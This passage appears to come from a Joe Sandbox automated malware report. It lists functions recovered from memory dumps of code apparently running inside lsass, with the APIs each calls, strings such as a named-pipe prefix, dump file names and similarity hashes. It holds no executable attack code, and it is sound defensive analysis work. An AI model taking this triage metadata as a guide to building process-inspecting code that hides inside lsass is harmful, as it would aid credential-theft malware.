StrStrW.SHLWAPI ref: 0000017D2DD53990
StrToIntW.SHLWAPI ref: 0000017D2DD539B7

Part of subcall function 0000017D2DD51A30: OpenProcess.KERNEL32 ref: 0000017D2DD51A56
Part of subcall function 0000017D2DD51A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000017D2DD51A74
Part of subcall function 0000017D2DD51A30: PathFindFileNameW.SHLWAPI ref: 0000017D2DD51A83
Part of subcall function 0000017D2DD51A30: lstrlenW.KERNEL32 ref: 0000017D2DD51A8F
Part of subcall function 0000017D2DD51A30: StrCpyW.SHLWAPI ref: 0000017D2DD51AA2
Part of subcall function 0000017D2DD51A30: CloseHandle.KERNEL32 ref: 0000017D2DD51AB0

Part of subcall function 0000017D2DD53F88: StrCmpNIW.SHLWAPI(?,?,?,0000017D2DD5272F), ref: 0000017D2DD53FA0

Strings

pid_, xrefs: 0000017D2DD53968

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 3339c7917aa704551e98117c40d034c359a0e0c72837dcb32f0ec74c5693b7a9
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: DB115431318F8592EB209B35F8003DA66B4FF44781F9845259E8D83696EFA9C9C7C740

Function 0000017D2DD83950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 0000017D2DD83972
StrStrW.SHLWAPI ref: 0000017D2DD83990
StrToIntW.SHLWAPI ref: 0000017D2DD839B7

Part of subcall function 0000017D2DD81A30: OpenProcess.KERNEL32 ref: 0000017D2DD81A56
Part of subcall function 0000017D2DD81A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000017D2DD81A74
Part of subcall function 0000017D2DD81A30: PathFindFileNameW.SHLWAPI ref: 0000017D2DD81A83
Part of subcall function 0000017D2DD81A30: lstrlenW.KERNEL32 ref: 0000017D2DD81A8F
Part of subcall function 0000017D2DD81A30: StrCpyW.SHLWAPI ref: 0000017D2DD81AA2
Part of subcall function 0000017D2DD81A30: CloseHandle.KERNEL32 ref: 0000017D2DD81AB0

Part of subcall function 0000017D2DD83F88: StrCmpNIW.SHLWAPI(?,?,?,0000017D2DD8272F), ref: 0000017D2DD83FA0

Strings

pid_, xrefs: 0000017D2DD83968

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 60df1b71e1231fa2c7469dbf85e8dad01a53585f23731e0545c19f3c18ea771c
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 4711423131CF8592EB21AB25F8503DA63B4FF44780FAC45259A8DC3696EF69C98BC740

Function 0000017D2DD61FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000017D2DD62027
WriteFile.KERNEL32 ref: 0000017D2DD62304
WriteFile.KERNEL32 ref: 0000017D2DD6234A
GetLastError.KERNEL32 ref: 0000017D2DD62409

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 3298a726dc5465890309b67df4462229f4f7f8e3e357887ff85e25c4a6c59ccf
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: B4D19B32718B4889E711CFA5E4407EC3BB5EB55B98F888216DE5D97B9ADA34C186C380

Function 0000017D2DD91FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000017D2DD92027
WriteFile.KERNEL32 ref: 0000017D2DD92304
WriteFile.KERNEL32 ref: 0000017D2DD9234A
GetLastError.KERNEL32 ref: 0000017D2DD92409

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 41f488ba3b8cddeaf4617f804082913e195b0740167ad272b5542c20528b2621
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: A8D1DF32718B8889E711CFA5E4403EC3BB5FB55B98F988216CE5D97B9ADA35C087C340

Function 0000017D2DD514A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000017D2DD514C6
HeapFree.KERNEL32 ref: 0000017D2DD514D5
GetProcessHeap.KERNEL32 ref: 0000017D2DD514E2
HeapFree.KERNEL32 ref: 0000017D2DD514F1
GetProcessHeap.KERNEL32 ref: 0000017D2DD51501

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 0f95c1dffc8255ab5602c6e5a498ab9dff0cbe01a932d44c9348a9f5b6c20eba
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 98011332619F98DAE714DF66B80428977B1FB89F80B094025DB4D53729DE38D4D2C780

Function 0000017D2DD814A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000017D2DD814C6
HeapFree.KERNEL32 ref: 0000017D2DD814D5
GetProcessHeap.KERNEL32 ref: 0000017D2DD814E2
HeapFree.KERNEL32 ref: 0000017D2DD814F1
GetProcessHeap.KERNEL32 ref: 0000017D2DD81501

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: cd02153ce22ce19679769f5172814509ef17c4f9f749e7c6ac4d95d36cdfb506
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 77011332618F98DAE714DF66B80428977B1FB89F80B194026DB4DA3729DE39D492C740

Function 0000017D2DD628F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000017D2DD628DF), ref: 0000017D2DD62A12

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: aa166f6266bb96c49c0b0f95c8e07a40ccaf4e3586e99a536f9aed07c311213a
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 6A91B132618B5999FB608F65B4503ED2BB0FB55B98F4C9106DE4E67A8ADA34C4C7C3C0

Function 0000017D2DD928F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000017D2DD928DF), ref: 0000017D2DD92A12

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 161731ed0ae2ef707c3846a923dcaaa592243d47a9ec6ea24c75e78032a4b9d3
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 2191D37261CF5899FB609F65A4507ED2FB0BB55B88F8C8106DE4E53A9ADA36C4C7C300

Function 0000017D2DD58090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000017D2DD580BC
GetCurrentThreadId.KERNEL32 ref: 0000017D2DD580CA
GetCurrentProcessId.KERNEL32 ref: 0000017D2DD580D6
QueryPerformanceCounter.KERNEL32 ref: 0000017D2DD580E6

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 4157c9474ce7d2e752517023a27d0e78ade98282bef4b994be3812213f498eb2
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 2E113036754F088AEB00CF60F8543E833B4FB19758F880E21EA6D867A5DF78C1968380

Function 0000017D2DD88090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000017D2DD880BC
GetCurrentThreadId.KERNEL32 ref: 0000017D2DD880CA
GetCurrentProcessId.KERNEL32 ref: 0000017D2DD880D6
QueryPerformanceCounter.KERNEL32 ref: 0000017D2DD880E6

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 2aa209a757e4fbc714ef488a962a096078ee1508234afb1299f8c663f67ae909
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 26111836758F088AEB00CF60F8543E833B4FB19758F880E21DA6D867A9DB78C1958340

Function 0000017D2DD827E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000017D2DD828CC
StrCpyW.SHLWAPI ref: 0000017D2DD828E5

Part of subcall function 0000017D2DD83F88: StrCmpNIW.SHLWAPI(?,?,?,0000017D2DD8272F), ref: 0000017D2DD83FA0

Strings

\\.\pipe\, xrefs: 0000017D2DD828D7

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 22f2695277af76d670f0967431e5bfea649157ade2b1d551e0a59b770f421315
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 9371A436208F4552E7769F26A8543EA6BB4FB44B84F6C4016DD4DC3B86DA35CA87C740

Function 0000017D2DD280A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000017D2DD280CB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000017D2DD28162

Strings

csm, xrefs: 0000017D2DD28149

Memory Dump Source

Source File: 00000009.00000003.1782464858.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_3_17d2dd20000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 3ac9d71f64e126eaf44fec6926ac91d70d8a3b8c0250537b7c388df9b0915fe2
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: D9518A32259F088AEB54CB15F448BA937B1EF54B98F198125EA4E4778FDB79D882C700

Function 0000017D2DD29AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 0000017D2DD29BA7

Strings

RCC, xrefs: 0000017D2DD29B77
MOC, xrefs: 0000017D2DD29B6F

Memory Dump Source

Source File: 00000009.00000003.1782464858.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_3_17d2dd20000_lsass.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 6277699836f2ef0ffb95fe119b8b3529a6a6aa0f2a0a27a23f57712dfb66d9c3
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: BB617972508BC886EB619B15F4447DAB7B0FB95B98F084215EB9C07B9BCB78D1D6CB00

Function 0000017D2DD525DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000017D2DD526C2
StrCpyW.SHLWAPI ref: 0000017D2DD526D9

Strings

\\.\pipe\, xrefs: 0000017D2DD526CD

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 35267cd655bf9caf2e33435e48c99650ca7eaeacb93b2f1d621d557c5748305f
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: A451083620CF8A51E624DE25B4543EA6B71FB85B90F4C8025CD5D53B8BDEB9C48AC740

Function 0000017D2DD825DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000017D2DD826C2
StrCpyW.SHLWAPI ref: 0000017D2DD826D9

Strings

\\.\pipe\, xrefs: 0000017D2DD826CD

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 23e35751b5abfab3b77e63a031846c12326ec51ae4d032a5ea77df319e333399
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 14511A3660CF8952E6668E27B8543EA6B71FB94780F6C8025CD4D83B4BDA35C887C740

Function 0000017D2DD62660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000017D2DD62778
GetLastError.KERNEL32 ref: 0000017D2DD6279D

Strings

U, xrefs: 0000017D2DD62722

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 72de2532ea490e7dffc4b3d9ad32238eb81dd84d989dfa065ece3d23a1744465
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 5741F532629F8886E710CF65F4447DAB7B0FB58784F884121EE4D87799EB78C482CB80

Function 0000017D2DD92660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000017D2DD92778
GetLastError.KERNEL32 ref: 0000017D2DD9279D

Strings

U, xrefs: 0000017D2DD92722

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 492664b8bfdbf055df8f1fa8c2a846768a128b9748a37560dfc5af203f170ba4
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: C541C37262DF8886E7109F65F4447DAB7B0FB48784F984121EE4D87759EB39C482CB40

Function 0000017D2DD59178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000017D2DD591C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,0000017D2DD587F7), ref: 0000017D2DD59209

Strings

csm, xrefs: 0000017D2DD591F6

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 2b9d1bb40f4fa3f8fa971c5af465a33c2449e1adeffbe0ac49bef364339b357f
